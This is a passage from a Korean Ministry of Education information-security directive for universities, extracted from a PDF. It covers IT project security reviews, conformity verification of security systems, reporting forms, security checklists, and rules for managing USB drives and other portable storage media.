파기등비밀업무와관련된정보시스템및네트워크구축 2. 국가용보안시스템과상용암호모듈ㆍ정보보호시스템을도입운용하고자할경우 3. 국방ㆍ외교등국가안보상중요한정보통신망및정보시스템의구축 - 26 -
4. 대규모정보시스템또는다량의개인정보를처리하는정보시스템구축 5. 전력ㆍ교통등국민생활과밀접한정보통신기반시설의중요제어시스템구축 6. 내부정보통신망을인터넷이나타기관전산망등외부망과연동하는경우 7. 업무망과연결되는무선네트워크시스템구축 8. 와이브로ㆍ스마트폰등첨단 IT기술을업무에활용하는시스템구축 9. 원격근무시스템구축 10. 업무망과인터넷분리사업 11. 그밖에대학또는국가정보원장이보안성검토가필요하다고판단하는정보화사업 2 대학은제1항에서명시된사업을제외한경미한사업은교육과학기술부장관및시 도교육감에게보안성검토를의뢰하여야한다. 3 제1항및제2항의보안성검토대상정보화사업에관련된구체적인사항은부록2( 정보화사업보안성검토처리기준 ) 를참조한다. 4 대학은제1항에명시된보안성검토대상사업의경우에도국가정보원장의승인을받아보안성검토를생략할수있다. 5 제1항의제2호에명시된국가용보안시스템과암호모듈ㆍ정보보호시스템자체에대한검증은 국가정보보안기본지침 제 27조, 제78조, 제113 조, 제123 조내지제129 조등에따른다. 6 대학은해당연도의정보통신망보안성검토대상사업현황을 1.25까지교육과학기술부장관및시 도교육감에게제출하여야한다. 이경우제6조의규정에의한추진계획을활용하거나별도로제출할수있다. 제66조 ( 보안성검토절차 ) 1 대학이정보통신망보안성검토를의뢰하는업무절차는다음과같다. 1. 대학은자체적으로수립한보안대책에대하여자체보안심사위원회심사를거친후보안성검토를요청한다. 2 제65조제1항에서명시된사안을제외한경미한사업을추진할경우에교육과학기술부장관은소속 공공기관및대학에대한보안성검토를시ㆍ도교육감은교육행정기관및초 중등학교에대한보안성검토를자체수행한다. 3 정보통신망보안성검토는서면검토를원칙으로하되필요하다고판단하는경우에는현장확인을병행실시할수있다. 제67조 ( 제출문서 ) 1 대학은정보통신망보안성검토를요청할경우에는다음각호의문서를제출하여야한다. 1. 사업계획서 ( 사업목적및추진계획포함 ) 2. 기술제안요청서 (RFP) 3. 정보통신망구성도 (IP주소체계포함 ) 4. 자체보안대책강구사항 - 27 -
2 제1항제4호의자체보안대책강구사항에는다음각호를포함하여야한다. 1. 보안관리수행체계 ( 조직, 인원 ) 등관리적보안대책 2. 정보시스템설치장소에대한보안관리방안등물리적보안대책 3. 국가용보안시스템및국가정보원장이개발하거나안전성을검증한암호모듈ㆍ정보보호시스템도입운용계획 4. 국가기관간망연동시해당기관간보안관리협의사항 5. 서버, 휴대용저장매체, 네트워크등정보통신망의요소별기술적보안대책 6. 재난복구계획또는상시운용계획 제68조 ( 결과조치 ) 1 대학은보안성검토결과를준수하여보안대책을강구하여야한다. 이경우, 교육과학기술부장관및시 도교육감은보안성검토결과신속한시정이필요하다고판단하는경우에는필요한조치를요청할수있으며해당기관의장은특별한사유가없는한이에따라야한다. 2 교육과학기술부장관및시 도교육감은정보통신망보안대책이적절히수립되었는지등이행여부확인을위해현장점검을실시할수있다. 제 2 절보안적합성검증 제69조 ( 정보보호시스템의도입등 ) 1 대학은정보및정보통신망등을보호하기위해정보보호시스템을도입할수있다. 다만, 별표3에규정된유형의시스템에대해서는해당도입요건을만족하는경우로한정한다. 제70조 ( 보안적합성검증대상및신청 ) 1 대학은제72조에의해정보보호시스템도입할경우사전에보안담당관을경유하여보안심사위원회에보안적합성검증을신청하여야한다. 2 보안적합성검증대상은다음각호와같다. 1. 상용정보보호시스템 2. 대학이자체개발하거나외부업체등에의뢰하여개발한정보보호시스템 3. 제68조의보안성검토결과세부검증이필요하다고판단된보안기능이있는정보시스템및제어시스템등 3 제2항에도불구하고, 다음각호의경우에는검증을생략할수있다. 1. 국가정보원장이정한국내용 CC 인증제도에따라인증을받은정보보호시스템 2. 국가정보원장이안정성을확인한암호제품 3. 그밖에국가정보원장이보안적합성검증이불요하다고인정한시스템 제 71 조 ( 결과조치 ) 1 보안적합성검증신청에필요한제출문서는다음과같다. 1. 상용정보보호시스템 가. 별지제 6 호서식의정보보호시스템도입시확인사항 1 부 - 28 -
나. 별지제7호서식의보안적합성검증신청서 1부다. 기술제안요청서사본 1부 2. 자체개발하거나외부업체등에의뢰하여개발한시스템가. 별지제6호서식의정보보호시스템도입시확인사항 1부나. 별지제7호서식의보안적합성검증신청서 1부다. 기술제안요청서사본 1부라. 상세설계서 1부마. 개발완료보고서 1부바. 사용설명서 1부 2 보안심사위원회는제1항의제출문서이외에보안적합성검증에필요하다고판단될경우추가자료를요청할수있으며이경우, 특별한사유가없는한 15일이내에추가자료를제출하여야한다. 제72조 ( 사후관리 ) 1 대학은보안적합성검증완료이후시스템에새로운취약점이발견될경우에는즉시제거한후그결과를교육과학기술부장관에게통보하고제거가불가능할경우에는그사실을교육과학기술부장관에게통보하여조치를받아야한다. 2 교육과학기술부장관은신규취약점이발견된시스템에대해대학에게취약점제거를요청할경우대학은특별한사유가없는한 30일이내에이를제거하고그결과를교육과학기술부장관에게통보하여야한다. 제 73 조 ( 무단변경및오용금지 ) 대학은보안적합성검증이완료된시스템의형상을무단변경 하거나도입목적이외의용도로운용하여서는아니된다. 제 7 장보칙 제74조 ( 다른법령과의관계 ) 이지침에명시되지않은사항은다음각호의법령에따른다. 1. 전자정부법 및동법시행령 2. 정보통신기반보호법 및동법시행령 3. 정보및보안업무기획 조정규정 4. 보안업무규정 5. 보안업무규정시행규칙 6. 국가사이버안전관리규정 7. 교육사이버안전센터운영규정 - 29 -
8. 국가정보보안기술연구개발지침 9. USB 메모리등보조기억매체보안관리지침 10. RFID 보안관리지침 11. USB형음어자재운용관리지침 12. 전자정부암호이용기반시스템운용및관리지침 13. 정보보호시스템평가 인증지침 14. 정보보호시스템평가 인증수행규정 15. 연도보안업무수행지침 16. 기타관련법령 부 칙 제 1 조 ( 시행일 ) 이지침은 2011. 5. 30 일부터시행한다. - 30 -
별 표 - 31 -
별표 1 통신보안위규사항 - 32 -
- 33 -
별표 2 정보보안사고유형 - 34 -
별표 3 정보보호시스템유형별도입요건 - 35 -
상기표에따라 CC 인증을받은정보보호시스템을도입하였다고할지라도 CC 인증을받지않은 보안기능을사용하지않도록조치필요 - 36 -
별지서식 - 37 -
별지제 1 호서식 정보보안업무세부추진계획 < 작성요령 > 1. 활동목표 2. 기본방침 3. 세부추진계획 분야별사업명세부추진계획주관ㆍ관련부서비고 * 보안성검토대상여부표기 4. 전년도보안감사ㆍ지도방문시도출내용과조치내역 도출내용조치내역담당부서 * 형식적인계획수립을지양하고소속및산하기관의추진계획을종합, 자체실정에맞게 작성 - 38 -
별지제 2 호서식 1. 총평 2. 주요성과및추진사항 3. 세부사업별실적분석 정보보안업무심사분석 추진계획추진실적문제점개선대책 * 추진실적은목표량과대비하여성과달성도를계량화 4. 부진 ( 미진 ) 사업 부진사업원인및이유익년도추진계획 5. 애로및건의사항 6. 첨부 ( 정보통신망및정보보호시스템운용현황등 ) - 39 -
별지제 3 호서식 전파측정활동결과보고 1. 일반사항 o 측정기간및지역 o 측정장비 o 참여기관및인원 2. 측정결과내용 기간측정지점통신구간주파수 (MHz) 신호세기 (dbm) 취약여부 비고 * 디지털 / 아날로그 구분 3. 분석및평가 4. 조치및대책 - 40 -
별지제 4 호서식 정보시스템관리대장 연번소속취급자 ( 성명 ) 종류 ( 서버ㆍ PC 등 ) 관리번호도입일자비고 - 41 -
별지제 5 호서식 - 42 -
[ 별지제 6 호서식 ] 정보보호시스템도입시확인사항 점검결과는 O, X 로표기 - 43 -
[ 별지제 7 호서식 ] 보안적합성검증신청서 - 44 -
[ 별지제 8 호서식 ] 보안관제센터운영현황 보안관제센터개요 개소 * 개소일자기재 위치 규모 * 상황실면적등 예산 * 구축예산및운영예산 조직현황 개요 * 조직구성, 인원및임무, 근무형태등기술 1 부서 ( 소속 ) 직급 센터장 성명 이메일연락처전화 : HP: 2 부서 ( 소속 ) 담당분야 직급 / 직책 성명 이메일연락처전화 : HP: 3 : * 센터장과탐지ㆍ분석ㆍ대응등담당분야별대표자만기입 외부인력현황 업체명 인원수 계약기간 대표이사 근무형태 수행업무 지침ㆍ매뉴얼현황 지침 매뉴얼 기준 기타 보안관제시스템현황 시스템명 * 주요기능기술시스템명 시스템명 시스템명 시스템명 시스템명 - 45 -
보안장비보유현황 F/W * 제품명및사용대수기입 IDS/IPS ESM 라우터 WEB F/W 기타장비 보안관제연동기관현황 예 ) NMS 1 대 * 네트워크구성도사본제출 * 대상기관수, 기관명, 대상목표 ( 인터넷또는내부망, 홈페이지등 ) 기술 연동기관 IP 할당현황 1 연동기관 성명 공인IP IP 관리자 연락처 전화 : HP: 사설IP 전자우편 2 : : : : 3 : : : : 4 : : : : 5 : : : : 6 : : : : - 46 -
[ 별지제 9 호서식 ] 사이버공격정보이관 탐지정보 탐지기관명 00 보안관제센터탐지자 탐지이벤트 탐지방법 발생일시 이관일시 연락처전화 : Fax : 공격정보 공격 IP 공격포트 피해 IP ( 국적 기관 ) 피해포트 경유 IP ( 국적 기관 ) 발생건수 사고유형 ( 건 / 분 ) 공격내용 - 47 -
부 록 - 48 -
[ 부록 1 ] 정보화사업단계별보안조치사항 ( 요약 ) 1. 정보화사업계획수립 2. 자체보안대책수립 3. 보안심사위원회심사 4. 보안성검토의뢰 7. 검토결과반영 8. 사업공고ㆍ입찰 6. 검토결과통보 5. 보안성검토 9. 시스템ㆍ용역업체선정 10. 시스템도입ㆍ용역개시 13. 사업진행 15. 최종검수 16. 정보화사업완료 정보보호제품은도입요건을만족하는제품선정 11. 보안적합성검증의뢰 14. 적합성검증결과통보 12. 보안적합성검증 17. 시스템운영 ( 유지보수 ) 19. 이행여부확인결과통보 20. 안전측정의뢰 22. 측정결과통보 18. 이행여부의확인 ( 필요시 ) 전자문서보관ㆍ유통보안조치이행여부정보통신망안전성확인등 21. 안전측정 ( 필요시 ) 보안성검토, 이행여부의확인, 안전측정등의수행시기변동가능 ( 정보보안관리 실태평가등일부사항제외 ) - 49 -
[ 부록 2 ] 정보화사업보안성검토처리기준 - 50 -
보안성검토대상정보화사업구분 국정원보안성검토대상정보화사업 ❶ 비밀ㆍ국가안보ㆍ정부정책과관련되는사업 o 비밀등국가기밀의유통ㆍ관리와관련된정보시스템구축 o 외교ㆍ국방등국가안보상중요한정보통신망구축 o 재난대비등국가위기관리와관련된정보통신망구축 o 에너지ㆍ교통ㆍ수자원등국가기반시설의전자제어시스템구축 o 외국정부ㆍ기관간정보통신망구축 o 정상회의등국제행사를위한정보통신망구축 o 정부정책을지원하는정보통신망구축 ❷ 대규모예산투입과다량의 DB 자료를처리하는사업 o 대규모정보시스템구축 (10 억이상 ) 정보화사업 o 다량의개인정보 (100 만명이상 ) 를처리하는정보시스템구축 o 지리ㆍ환경정보등국가차원의통합 DB 구축 - 51 -
❸ 외부기관간망연동등보안상취약사업 o 다수기관이공동활용하기위한정보시스템구축및망연동 o 내부전산망또는폐쇄망을인터넷이나타기관의전산망등다른정보통신망과연동하는경우 o 원격근무지원시스템구축 ❹ 보안정책과제및최신 IT 기술적용 o 업무망ㆍ인터넷분리정보화사업 o 업무망 인터넷간자료교환시스템구축 o 보안관제센터 ( 보안관제시스템 ) 구축 o 업무망과연결되는무선네트워크시스템구축 o 스마트폰등첨단 IT 기술을업무에활용하는시스템구축 ❺ 기타, 국가정보원장및교육과학기술부장관, 시 도교육감이보안성검토가필요하다고판단하는정 보화사업 - 52 -
교육과학기술부및시 도교육청보안성검토대상정보화사업 ❶ 기존정형화된정보화사업 o 홈페이지구축ㆍ개선등웹시스템구축 o 민원ㆍ기자실등외부인용무선랜구축및무선랜공유기설치 o 민원ㆍ기자실내외부인용인터넷 PC 및교육장내 PC 설치 o 인사관리ㆍ복지관리시스템구축등인터넷등다른정보통신망과연결되지않은단순내부직원 전용정보시스템구축 o 주요기반시설취약점분석ㆍ평가, 정보보안컨설팅등용역사업 ❷ 단일기능의정보시스템구축 o 회의용영상통화시스템등원격화상회의시스템구축 o 주ㆍ정차단속및하천감시용등 CCTV 시스템구축 o 백업시스템구축 o 대민콜센터시스템구축 o 인터넷전화시스템구축 ❸ 정보보호제품도입및전산ㆍ통신장비도입ㆍ교체 o 침입차단ㆍ탐지시스템ㆍ가상사설망 (VPN) ㆍ USB 관리시스템등정보보호제품도입ㆍ교체 o 스위치ㆍ라우터등네트워크장비및서버등전산장비도입ㆍ교체 o 전화ㆍ무전기및교환기등통신장비도입ㆍ교체 ❹ 기타국가정보원에서기작성ㆍ배포한보안지침으로자체보안대책강구가가능한정보화사업 - 53 -
보안성검토관련지침및실무매뉴얼 ❶ 국가정보보안기본지침 각급기관이수행하여야할정보보안기본활동규정 ❷ 안전한정보통신환경구현을위한네트워크구축가이드라인 (09.10) 원격화상회의시스템ㆍ CCTV 시스템등 20 개정보통신망의구성기준과보안고 려사항수록 ❸ 홈페이지보안관리매뉴얼 (05.5), 웹서버보안취약점대응가이드 (10.5) 디렉토리리스팅ㆍ파일다운로드등홈페이지취약점설명과함께보안취약 점별점검및조치방법수록 ❹ 외부용역업체보안관리방안 ( 사보-1847, 07.10, 사예-1579, 09.6) 용역사업사고사례및정보화사업입찰ㆍ계약ㆍ수행ㆍ종료시보안관리요령수록 사업착수시용역업체대표명의보안서약서징구, 자체보안업무규정 ( 지침 ) 에용역업체현장점검의무화명시 ❺ CCTV 보안취약점및보안대책 ( 사예 -132, 09.1) CCTV 시스템보안취약점및관리ㆍ기술적보안대책수록 ❻ 국가 공공기관인터넷전화보안가이드라인 (09.6) 사용자인증및통화내용암호화, 인터넷전화전용보안장비도입등 - 54 -
❼ 국가기관업무용스마트폰보안규격 (10.5) 국가기관이스마트폰을업무에활용시필요한보안요구규격제시 ❽ 국가ㆍ공공기관암호사용기준 (10.1, 대외비 ) 국가용보안시스템과행정정보보호를위한암호사용기준제시 ❾ 정보통신기기암호기술적용지침 (10.8) 정보통신기기의인증및암호화등에필요한기술기준제시 국가ㆍ공공기관업무전산망분리실무매뉴얼 (07.4) 물리적ㆍ논리적망분리방식및망분리절차등제시 국가ㆍ공공기관업무망 인터넷간안전한자료전송보안가이드라인 (10.8) 업무망ㆍ인터넷분리시상호간안전한자료전송체계구축지원 국가기반시설전자제어시스템보안가이드라인 (10.4) 안전한전자제어시스템구축및운영방안제시 - 55 -
[ 부록 3 ] 정보보안점검체크리스트 - 56 -
1. 정보보안기본활동 순번 세부점검사항 비고 1 기관자체실정에맞는정보보안업무내규를수립하고있는가? 2 매년정보보안업무활동계획을수립ㆍ시행하고심사분석하는가? 3 정보보안업무전담조직및직원 ( 정보보안담당관 ) 이지정되어있는가? 4 소속ㆍ산하기관대상정보보안감사ㆍ점검ㆍ지도방문을실시하는가? 5 소속ㆍ산하기관대상정보보안교육을실시하고있는가? 6 사이버보안진단의날을내실있게수행하는가? 7 정보보안위규ㆍ사고, 정보통신망장애발생시보고체계및조치절차가있는가? 8 정보시스템사용자에대한심사등인적보안절차ㆍ방법을강구중인가? 9 보직변경등인사이동시정보시스템접근권한을신속하게조정하는가? 10 서버ㆍPC 등정보시스템현황을제대로파악하는가? 11 정보통신장비 ( 노트북등 ) 반출입통제를철저히하는가? 12 업무자료를상용전자우편으로전송하고있지않는가? 13 정보통신망구축및유지보수업무를수행하는외부인력에대한신원확인및 보안서약서징구등충분한보안조치를하고있는가? 14 용역업체직원의내부정보시스템접근을통제하고있는가? 15 홈페이지에자료게재시자체보안성검토를시행하고있는가? 16 중요정보화사업에대하여국정원에보안성검토를의뢰하는가? 17 정보보호시스템 ( 암호모듈포함 ) 도입시보안적합성검증절차를준수하는가? 18 비밀을전자적으로처리할경우국가용보안시스템으로암호화하는등규정을준수하는가? - 57 -
2. PC 및서버보안관리 순번세부점검사항비고 1 PC ㆍ서버에설치된운영체제및응용프로그램을최신보안업데이트하였는가? 2 백신프로그램이자동업데이트되고실시간감시기능이설정되어있는가? 3 인터넷 PC 에업무관련자료 ( 비밀포함 ) 을보관하고있는가? 4 업무용 PC 에비밀이평문으로저장되어있는가? 5 P2P, 웹하드, 메신저등업무에무관한서비스가허용되거나비인가프로그램을 사용하지않도록보안조치하는가? 6 비인가자접근방지를위해 PC 부팅비밀번호를설정했는가? 7 서버내저장자료는중요도에따라권한설정이되어있는가? 8 9 10 11 공개서버가 DMZ 구간에위치하는등정보통신망구성측면에서 PC 및서버등의위치가적정한가? 인가받지않은휴대용저장매체 (USB, 이동형하드디스크, 메모리카드등 ) 를반입ㆍ휴대하고있는가? 전자우편비밀번호설정시특수문자포함, 8자리이상으로설정하고주기적으로변경사용하는가? 비밀은비밀용보안USB 를별도지정하여저장하고비밀관리기록부에등재하여사용하고있는가? 12 서버등정보시스템접근기록을유지관리하는가? 13 14 15 PCㆍ서버에비인가 USB 등비인가정보통신기기연결시작동되지않도록보안설정되어있는가? PCㆍ노트북등저장매체가있는기기의고장시저장된자료의완전삭제를확인하고외부에수리를의뢰하는가? 중요정보가저장된매체불용처리시전용소자장치로삭제하거나파쇄ㆍ용해등물리적으로완전파기하고있는가? - 58 -
3. 네트워크보안관리 - 59 -
4. 정보통신시설보안및대도청활동 - 60 -
5. 암호장비ㆍ논리, 보안자재관리 - 61 -
6. 보안관제등해킹대응활동 - 62 -
[ 부록 4 ] 정보보호수준자가진단항목 - 63 -
정보보호수준자가진단항목 진단항목진단부문세부지표 1. 정보보호관리체계 (32 점 ) 2. 기술적 물리적보호 (13 점 ) 3. 접근관리및운영관리 (18 점 ) 4. 자산관리 (14 점 ) 5. 인적보호 (11 점 ) 6. 보안사고대응체계 (12 점 ) 1. 정보보호리더십 (8 점 ) 2. 정보보호정책 (22 점 ) 3. 감사및책임추적성 (2 점 ) 1. 정보보호시스템구축 운영 (5 점 ) 2. 물리적 환경적보호 (5 점 ) 3. 보안적합성검증 (3 점 ) 1. 접근관리 (10 점 ) 2. 정보통신망운영관리 (1 점 ) 3. 정보시스템운영관리 (7 점 ) 1. 정보자산관리 (11 점 ) 2. 보조기억매체관리 (3 점 ) 1. 사용자 PC 보호 (4 점 ) 2. 개인정보보호 (7 점 ) 1. 대응계획및체계 (6 점 ) 2. 사고대응및복구 (4 점 ) 3. 자연재해대응 (2 점 ) CEO 의관심도, CSO CPO 운영및정보보호예산 조직등 5 개지표 정보보호규정 계획, 정보보호교육및인식제고등 18 개지표 자체정보보안감사계획수립및이행등 1 개지표 방화벽, 침입탐지 방지시스템및패치관리시스템등 10 개지표 정보통신시설에대한접근통제, CCTV 운영등 5 개지표 보안적합성검증업무절차, 도입 운용등 3 개지표 계정및로그인관리, 시스템 통신망접근통제등 8 개지표 서비스및정보통신망이중화등 2 개지표 백업 복구, 시스템 응용프로그램및암호키관리등 7개지표 분리 자산인가및조사, 정보자산보안관리등 9 개지표 보조기억매체관리규정및보안대책수립등 5 개지표 사이버보안진단의날, 불법소프트웨어자체점검등 4 개지표 개인정보보호자체규정, 보안대책수립및공지등 5 개지표 침해사고대응계획수립및협조체계구축등 4 개지표 자체모의대응훈련실시, 상시모니터링및보안사고분석등 3 개지표 자연재해대응체계, 훈련절차등 2 개지표 6 개항목 (100 점 ) 16 개부문 91 개지표 - 64 -
[ 부록 5 ] USB 메모리등휴대용저장매체보안관리지침 - 65 -
제1조 ( 목적 ) 이지침은 정보보안기본지침 제 39조제8 항에따라 USB(Universal Serial Bus) 메모리등휴대용저장매체보안관리에필요한세부사항을규정함을목적으로한다. 제2조 ( 적용범위 ) 이지침은교육과학기술부와그소속 산하기관, 시 도교육청과그소속 산하기관, 공공기관, 대학 ( 이하 각급기관 이라한다 ) 에적용한다. 제3조 ( 정의 ) 이지침에서사용하는용어의정의는다음과같다. 1. 휴대용저장매체 라함은디스켓, 외장형하드디스크 (HDD), USB메모리, CD(Compact Disk), DVD(Digital Versatile Disk) 등자료를저장할수있는일체의것으로 PC 등의정보통신시스템과분리할수있는기억장치를말한다. 2. 휴대용저장매체관리책임자 ( 이하 관리책임자 라한다 ) 라함은각팀또는과별휴대용저장매체관리상의책임을맡은부서의장을말한다. 3. 휴대용저장매체취급자 ( 이하 취급자 라한다 ) 라함은해당휴대용저장매체를사용하는자를말한다. 4. 휴대용저장매체관리시스템 ( 이하 관리시스템 이라한다 ) 라함은휴대용저장매체의등록, 파기, 재사용, 반출 입, 불용처리현황등에관하여전자적으로처리하는시스템을말한다. 5. 휴대용저장매체관리번호 ( 이하 관리번호 라한다 ) 라함은사용중인휴대용저장매체의식별및관리를용이하게하기위하여부여한번호를말한다. 제4조 (USB메모리및관리시스템도입절차 ) 1 각급기관의장은 USB 메모리를도입할경우그제품의안전성을검증하기위하여 전자정부법 제 56조제3항및동법시행령제69조등에따라국가정보원장에게보안적합성검증을의뢰하여야한다. 2 국가정보원장은보안적합성검증시다음각호에해당하는필수보안기능의유무를검토한후그결과를적합성검증결과에반영한다. 1. 사용자식별ㆍ인증기능 2. 지정데이터암 복호화기능 3. 저장된자료의임의복제방지기능 4. 분실시저장데이터의보호를위한삭제기능 3 제2항제2호의지정데이터암 복호화기능은자료를 USB메모리에보관하는경우로한하며, 비밀자료를 PC에보관하거나소통하고자할경우에는국가정보원이개발ㆍ보급한암호장비ㆍ자재등국가용보안시스템을사용하여야한다. - 66 -
4 각급기관의장은운용중인보조기억매체를안전하게관리하기위하여보조기억매체관리시스템을구축할수있다. 이경우별지제1호내지별지제6호서식에갈음할수있다. 제5조 ( 휴대용저장매체사용 ) 1 각급기관은휴대용저장매체를등록한후사용하여야한다. 2 휴대용저장매체의등록방법은제7조의규정에따라각급기관별별지제1호내지별지제2 호서식을이용하여보조기억매체관리대장 ( 이하 관리대장 이라한다 ) 에등재하는것을말한다. 제6조 ( 휴대용저장매체사용제한 ) 1 각급기관은등록된휴대용저장매체만사용할수있으며업무목적이외사적인용도로사용할수없다. 2 각급기관의장은그소속직원이국제회의참가시출장전회의대상국이제공한 USB메모리등휴대용저장매체를사용하지않도록보안교육을실시한다. 다만, 불가피하게사용할경우최신백신으로악성코드감염여부를확인하는등보안조치후사용토록하여야한다. 3 각급기관의장은그소속직원에게공지 교육을통하여휴대용저장매체의임의사용을제한하여야하고이에대하여주기적인점검을실시하여야한다. 제7조 ( 관리책임자 ) 1 각급기관의휴대용저장매체는각팀장또는과장책임하에관리하는것을원칙으로하며그팀장또는과장을 관리책임자 라칭한다. 2 관리책임자는소관부서에서휴대용저장매체를사용할경우, 별지제1호, 제2호서식의일반용, 비밀용휴대용저장매체관리대장 ( 이하 관리대장 이라한다 ) 을각각비치하여야한다. 3 관리책임자는관리대장에최종변경된휴대용저장매체의등록현황을등재하여야하며사본 1부를정보보안담당관에게제출하여야한다. 4 관리책임자는월 1회이상휴대용저장매체수량및보관상태를점검하고별지제3호서식에따라확인 서명하여야한다. 5 관리책임자는휴대용저장매체의반 출입을통제하여야하며별지제4호서식에따라기록하여야한다. 이때반ㆍ출입은업무상목적 ( 별지제4호서식의 용도 참조 ) 에한한다. 다만, 각급기관의장이보안강화를위하여중앙에서휴대용저장매체의반 출입통제가필요하다고판단하는경우에는정보화담당관에게그역할을부여할수있다. 6 관리책임자는소속직원이미등록휴대용저장매체를무단반출하거나미등록휴대용저장매체를사용하지않도록감독하여야하며이를위반한사실을발견또는확인하는즉시정보보안담당관에게통지하여야한다. 제8조 ( 정보보안담당관의책무 ) 1 정보보안담당관은소속기관내에서사용하는휴대용저장매체등록현황을파악하여야한다. 이경우각부서팀ㆍ과별관리대장사본을비치ㆍ관리하는 - 67 -
것으로갈음할수있다. 2 정보보안담당관은각팀ㆍ과별관리책임자가별지제5호서식에따라휴대용저장매체라벨작성및별지제6호서식에따라불용처리확인을요청하는경우에는확인한후날인하여야한다. 3 각급기관의장은정보보안담당관으로하여금휴대용저장매체를일괄구입하여필요한부서에보급할수있다. 4 정보보안담당관은휴대용저장매체가무단반 출입되거나미등록휴대용저장매체에업무자료를보관하는지여부등을주기적으로점검하여야하며, 관련위규사례를인지한경우에는경위조사를실시하여야한다. 5 정보보안담당관은대외비이상비밀이보관된휴대용저장매체를무단반출 분실하거나미등록휴대용저장매체에비밀을보관하고있는경우에는경위조사를실시하여야한다. 6 정보보안담당관은제4항및제5항에따라조사를실시한결과, 비밀유출이우려되거나유출징후가있는경우에는지체없이교육과학기술부장관에게보안사고조사를의뢰하여야한다. 제9조 ( 휴대용저장매체의구분및관리요령 ) 1 휴대용저장매체는일반용, 비밀용 ( 대외비포함 ) 으로구분한다. 2 일반용보조기억매체 ( 이하 일반용 이라한다 ) 의관리요령은다음과같다. 1. 일반용에는일반자료 ( 공인인증서포함 ) 만보관하여야하며별지제1호서식의관리대장에기록하여야한다. 2. 일반용은개인서랍, 캐비닛등에안전하게보관하여야한다. 3. 일반용에는별지제5호서식과같이기입ㆍ표시하여야한다. 4. 관리번호는팀ㆍ과명, 일반, 연번으로한다. 이경우팀ㆍ과명은약칭을사용할수있다. ( 예 : 총무과-일반 -01, 총무과-일반 -02, 총무-일반 -03 등 ) 3 대외비이상자료를보관하는비밀용휴대용저장매체 ( 이하 비밀용 이라한다 ) 관리요령은다음과같다. 1. 비밀용을사용할경우에는별지제2호서식의관리대장에기록하여야하며대외비이상의기밀자료가수록되어있는경우에는비밀관리기록부에도등재ㆍ관리하여야한다. 2. 비밀용은비밀자료와동일하게이중캐비닛또는금고에보관하여야한다. 3. 비밀용에는별지제5호서식과같이기입ㆍ표시하여야한다. 4. 비밀용을사용하여비밀작업을하는경우그작업을완료하거나일시중단할때에는 PC 에서즉시분리하여야한다. 5. 비밀용은해당비밀을생산하거나보관할필요가있는경우비밀등급별로각각보조기억매체를마련해야하며, 하나의보조기억매체에등급이다른비밀또는대외비를혼합보관해서는아니된다. - 68 -
6. 관리번호는팀ㆍ과명, 비밀등급, 연번으로한다. 이경우팀ㆍ과명은약칭을사용할수있다.( 예 : 총무과 -Ⅱ급-01, 총무과 -Ⅲ급-01, 총무-대외비 -01 등 ) 4 제3 항과관련된비밀의전자적처리와관련한그밖의사항에대해서는 국가정보보안기본지침 제30조 ( 비밀의전자적처리 ) 를준용한다. 제10조 ( 휴대용저장매체불용처리및재사용 ) 1 업무상목적으로사용한휴대용저장매체는불용처리시물리적파기를원칙으로하며그사실을관리대장에기록하여야한다. 2 일반용을타부서이전또는용도를전환하여사용하고자할경우에는수록된자료를완전히삭제ㆍ포맷후사용하여야한다. 3 비밀용을일반용또는다른등급의비밀용으로전환하여사용할경우또는일반용을외부기관에이전하여사용하는경우에는파일삭제ㆍ포맷및필요한경우자성소거등의파일복원방지대책을강구하여야한다. 4 휴대용저장매체를불용처리하거나재사용하는경우에는별지제6호서식에따라정보보안담당관의확인을받아야하며확인서를보관하여야한다. 제11조 ( 휴대용저장매체의분실, 소각시대처방안 ) 1 취급자는휴대용저장매체의분실또는소각등의사유가발생한즉시관리책임자에게그사실을보고하여야한다. 2 관리책임자는휴대용저장매체의분실또는소각사실을보고받은즉시정보보안담당관에게통지하여야한다. 3 정보보안담당관은일반용의분실또는소각사실을통지받거나인지한경우에는자체조사를실시하고재발방지대책을강구하여야한다. 4 정보보안담당관은비밀용의분실또는소각사실을통지받거나인지한경우에는지체없이교육과학기술부장관및국가정보원장에게그사실을통보하여야한다. 제12조 ( 휴대용저장매체고장ㆍ훼손, 오인삭제ㆍ포맷시대처방안 ) 1 휴대용저장매체의고장, 자료의훼손또는자료의오인삭제, 포맷시제10조의규정에의거불용처리를원칙으로한다. 다만, 자료의복구가필요한경우상용소프트웨어활용및민간업체에의뢰할수있다. 2 제1항에따라민간업체에의뢰하는경우에는정보보안담당관과협조하여보안서약서징구등적절한보안대책을강구하여야한다. 다만, 비밀자료가포함된경우에는우선정보보안담당관을경유하여교육과학기술부장관에게통보하여야한다. - 69 -
별지제 1 호서식 휴대용저장매체관리대장 ( 일반용 ) < 관리책임자 : 4 급이순신 > - 70 -
별지제 2 호서식 휴대용저장매체관리대장 ( 비밀용 ) < 관리책임자 : 3 급김유신 > - 71 -
별지제 3 호서식 휴대용저장매체점검대장 < 관리책임자 : 4 급김유신 > - 72 -
별지제 4 호서식 휴대용저장매체 ( 전산장비포함 ) 반출 입대장 < 관리책임자 : 4 급김유신 > - 73 -
별지제 5 호서식 휴대용저장매체라벨 2.5cm 정 일반 / 비밀용 ( 인 ) 관리번호표기부 5cm < 디스켓, 이동형 HDD 서식 > 1cm 일반 / 비밀용 ( 인 ) 관리번호표기 5cm <USB ㆍ CD 등서식 > 가. 同서식을만들어휴대용저장매체중앙의적절한위치에부착 나. 첫번째줄에는일반 / 비밀용 ( 인 ) 란에정보보안담당관또는관리책임자의직인을날인 다. 두번째줄에는휴대용저장매체관리번호표기 라. 세번째줄의 정 란에관리책임자, 부 란에취급자표기 (USB 메모리및 CD 의경우생략가능 ) 마. 휴대용저장매체의크기를고려하여서식 글자크기조정가능 - 74 -
별지제 5 호서식 일반용 ( 인 ) 총무과 - 일반 -01 정이순신부홍길동 대외비용 ( 인 ) 총무과 - 대외비 -01 정이순신부홍길동 공인인증서용 ( 인 ) 총무과 - 인증 -01 정이순신부홍길동 일반용 ( 인 ) 총무과 - 일반 -01 Ⅱ 급비밀용 ( 인 ) 총무과 -Ⅱ 급 -01 공인인증서용 ( 인 ) 총무과 - 인증 -01-75 -
별지제 6 호서식 휴대용저장매체불용처리확인서 아래와같이휴대용저장매체 ( 종 점 ) 불용처리및휴대용저장매체 ( 종 점 ) 재사용에대해확인을요청함 확인일자 : 년월일 요청자 : 소속ㆍ직책성명 : ( 인 ) 확인자 : 정보보안담당관성명 : ( 인 ) - 76 -
